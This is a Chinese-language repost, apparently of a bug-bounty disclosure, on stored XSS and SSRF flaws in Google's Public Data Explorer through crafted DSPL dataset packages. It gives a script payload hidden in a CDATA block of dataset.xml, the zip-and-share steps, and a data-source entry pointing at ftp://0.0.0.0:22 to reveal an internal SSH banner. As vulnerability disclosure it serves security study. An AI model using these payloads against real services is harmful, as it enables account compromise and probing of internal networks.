看我如何構(gòu)造DSPL語(yǔ)言包及發(fā)現(xiàn)Google的存儲(chǔ)型XSS和SSRF漏洞

本篇文章給大家分享的是有關(guān)看我如何構(gòu)造DSPL語(yǔ)言包及發(fā)現(xiàn)Google的存儲(chǔ)型XSS和SSRF漏洞，小編覺得挺實(shí)用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說(shuō)，跟著小編一起來(lái)看看吧。

下面講述我通過(guò)精心制作Google數(shù)據(jù)集發(fā)布語(yǔ)言（DSPL）包，在請(qǐng)求www.google.com的環(huán)境中構(gòu)造出存儲(chǔ)型XSS漏洞，另外，利用DSPL的遠(yuǎn)程數(shù)據(jù)源功能實(shí)現(xiàn)了本地服務(wù)訪問（也即SSRF）。

Google的數(shù)據(jù)集發(fā)布語(yǔ)言DSPL

Google的數(shù)據(jù)集發(fā)布語(yǔ)言：Google利用其具備的強(qiáng)大網(wǎng)絡(luò)數(shù)據(jù)收集能力，在數(shù)據(jù)挖掘和可視化方面擁有多項(xiàng)應(yīng)用，通過(guò)搭建可視化的商業(yè)和公共服務(wù)平，方便第三方公司和個(gè)人充分?jǐn)?shù)據(jù)收集可視化。用戶可以利用Google的數(shù)據(jù)集發(fā)布語(yǔ)言（Dataset Publishing Language,DSPL）接口，把他們自己的數(shù)據(jù)庫(kù)鏈接上Google的可視化工具，實(shí)現(xiàn)方便的個(gè)人定制數(shù)據(jù)可視化。

Google的公開數(shù)據(jù)瀏覽器(Public Data Explorer)是一款數(shù)據(jù)搜索和可視化顯示工具，它以官方數(shù)據(jù)為基礎(chǔ)，為一些常見的搜索請(qǐng)求制作圖表，以更加直觀的視覺形式反映出搜索結(jié)果。例如，我們可以利用它來(lái)方便地實(shí)現(xiàn)政府衛(wèi)生支出、世界銀行數(shù)據(jù)等大型數(shù)據(jù)集的搜集和可視化。

DSPL使用XML來(lái)描述數(shù)據(jù)集中的元數(shù)據(jù)，還會(huì)用到CSV數(shù)據(jù)文件，例如DSPL下的sample.zip壓縮包格式是這樣的：

Archive:  sample.zip
Length      Date    Time    Name
---------  ---------- -----   ----
      246  02-01-2018 13:19   countries.csv
      221  02-14-2011 17:13   country_slice.csv
     7812  03-04-2018 21:12   dataset.xml
      246  02-14-2011 17:13   gender_country_slice.csv
       28  01-29-2018 20:55   genders.csv
      200  02-14-2011 17:13   state_slice.csv
      300  01-29-2018 21:11   states.csv
---------                     -------
     9053                     7 files

漏洞端倪

問題就在于，Google的公開數(shù)據(jù)瀏覽器(Public Data Explorer)在使用數(shù)據(jù)集歸檔中提供的元數(shù)據(jù)時(shí)，不會(huì)去檢查這些元數(shù)據(jù)是否經(jīng)過(guò)有效編碼或安全驗(yàn)證。

以下面這個(gè)數(shù)據(jù)集的使用為例：

curl https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/dspl/tutorial1.0.zip -o sample.zip

unzip sample.zip; rm sample.zip

可以對(duì)數(shù)據(jù)集中dataset.xml文件的元數(shù)據(jù)名稱值進(jìn)行更改。另外在以下XML文件中，可以使用CDATA部分來(lái)包含JavaScript的執(zhí)行腳本（Payload），以防止其被當(dāng)做XML標(biāo)記來(lái)解析：

<info>
  <name>
    <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
  </name>
    <description>
      <value>Some very interesting statistics about countries</value>
    </description>
    <url>
      <value>http://google.com</value>
    </url>  
</info>

之后，執(zhí)行以下兩步操作：

zip -r poc.dspl *

將上述精心制作的數(shù)據(jù)集文件上傳到Google公開數(shù)據(jù)瀏覽器中(Public Data Explorer)，把它公開分享

這樣一來(lái)，只要點(diǎn)擊查看該數(shù)據(jù)集的用戶，都會(huì)在www.google.com請(qǐng)求環(huán)境中被執(zhí)行一段攻擊者精心制作的JavaScript惡意腳本（這種腳本如Coinhive）。

漏洞PoC測(cè)試

在以下視頻中我們可以看到，構(gòu)造一個(gè)包含惡意腳本的數(shù)據(jù)集壓縮包，上傳部署后，能成功執(zhí)行預(yù)定腳本：

http://v.youku.com/v_show/id_XMzQ3MTM0Njk0OA==.html

https://vimeo.com/258923005

而且，因?yàn)镈SPL還具備從遠(yuǎn)程HTTP或FTP源中進(jìn)行數(shù)據(jù)檢索，所以，利用該功能和上述缺陷可以實(shí)現(xiàn)SSRF攻擊，訪問到某些本地主機(jī)的服務(wù)數(shù)據(jù)資源（另外，深入利用，還可間接訪問到目標(biāo)系統(tǒng)內(nèi)與互聯(lián)網(wǎng)隔離的內(nèi)部網(wǎng)絡(luò)系統(tǒng)，進(jìn)一步對(duì)目標(biāo)系統(tǒng)內(nèi)的系統(tǒng)或設(shè)備造成安全威脅）

例如，把poc.dspl/dataset.xml中的內(nèi)容更改如下：

<table id="my_table">
  <column id="first" type="string"/>
  <column id="last" type="string"/>
  <data>
    <file format="csv" encoding="utf-8">ftp://0.0.0.0:22</file>
  </data>
</table>

在把該數(shù)據(jù)集進(jìn)行上傳分享時(shí)，Google服務(wù)端返回了HTTP/FTP請(qǐng)求的出錯(cuò)處理響應(yīng)，其中顯示了Google服務(wù)端的SSH詳細(xì)banner信息，實(shí)際上，這本來(lái)就是一種不應(yīng)公開顯示的服務(wù)端信息：

以上就是看我如何構(gòu)造DSPL語(yǔ)言包及發(fā)現(xiàn)Google的存儲(chǔ)型XSS和SSRF漏洞，小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘９ぷ鲿?huì)見到或用到的。希望你能通過(guò)這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注億速云行業(yè)資訊頻道。